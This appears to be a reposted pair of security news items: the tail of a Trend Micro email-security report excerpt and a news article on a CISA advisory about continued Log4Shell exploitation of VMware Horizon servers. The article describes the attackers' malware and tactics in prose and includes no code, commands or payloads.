This is a significant option since users’ email metadata might include undetected suspicious or dangerous URLs that have only recently been discovered. The examination of such metadata is thus an important part of forensic investigations that help determine if your email service has been affected by attacks. This solution also officially supports the Time-of-Click Protection feature to protect Exchange Online users against potential risks when they access URLs in incoming email messages.

Trend Micro Cloud App Security also comes with the advanced and extended security capabilities of Trend Micro XDR, providing investigation, detection, and response across your endpoints, email, and servers.

Source :
https://www.trendmicro.com/vinfo/us/security/research-and-analysis/threat-reports/roundup/trend-micro-cloud-app-security-threat-report-2021

Log4Shell Still Being Exploited to Hack VMWare Servers to Exfiltrate Sensitive Data

The U.S. Cybersecurity and Infrastructure Security Agency (CISA), along with the Coast Guard Cyber Command (CGCYBER), on Thursday released a joint advisory warning of continued attempts on the part of threat actors to exploit the Log4Shell flaw in VMware Horizon servers to breach target networks.

“Since December 2021, multiple threat actor groups have exploited Log4Shell on unpatched, public-facing VMware Horizon and [Unified Access Gateway] servers,” the agencies said. “As part of this exploitation, suspected APT actors implanted loader malware on compromised systems with embedded executables enabling remote command-and-control (C2).”

In one instance, the adversary is said to have been able to move laterally inside the victim network, obtain access to a disaster recovery network, and collect and exfiltrate sensitive law enforcement data.

Log4Shell, tracked as CVE-2021-44228 (CVSS score: 10.0), is a remote code execution vulnerability affecting the Apache Log4j logging library that’s used by a wide range of consumers and enterprise services, websites, applications, and other products.

Successful exploitation of the flaw could enable an attacker to send a specially-crafted command to an affected system, enabling the actors to execute malicious code and seize control of the target.

Based on information gathered as part of two incident response engagements, the agencies said that the attackers weaponized the exploit to drop rogue payloads, including PowerShell scripts and a remote access tool dubbed “hmsvc.exe” that’s equipped with capabilities to log keystrokes and deploy additional malware.

“The malware can function as a C2 tunneling proxy, allowing a remote operator to pivot to other systems and move further into a network,” the agencies noted, adding it also offers a “graphical user interface (GUI) access over a target Windows system’s desktop.”

The PowerShell scripts, observed in the production environment of a second organization, facilitated lateral movement, enabling the APT actors to implant loader malware containing executables that include the ability to remotely monitor a system’s desktop, gain reverse shell access, exfiltrate data, and upload and execute next-stage binaries.

Furthermore, the adversarial collective leveraged CVE-2022-22954, a remote code execution vulnerability in VMware Workspace ONE Access and Identity Manager that came to light in April 2022, to deliver the Dingo J-spy web shell.

Ongoing Log4Shell-related activity even after more than six months suggests that the flaw is of high interest to attackers, including state-sponsored advanced persistent threat (APT) actors, who have opportunistically targeted unpatched servers to gain an initial foothold for follow-on activity.

According to cybersecurity company ExtraHop, Log4j vulnerabilities have been subjected to relentless scanning attempts, with financial and healthcare sectors emerging as an outsized market for potential attacks.

“Log4j is here to stay, we will see attackers leveraging it again and again,” IBM-owned Randori said in an April 2022 report. “Log4j buried deep into layers and layers of shared third-party code, leading us to the conclusion that we’ll see instances of the Log4j vulnerability being exploited in services used by organizations that use a lot of open source.”

Source :
https://thehackernews.com/2022/06/log4shell-still-being-exploited-to-hack.html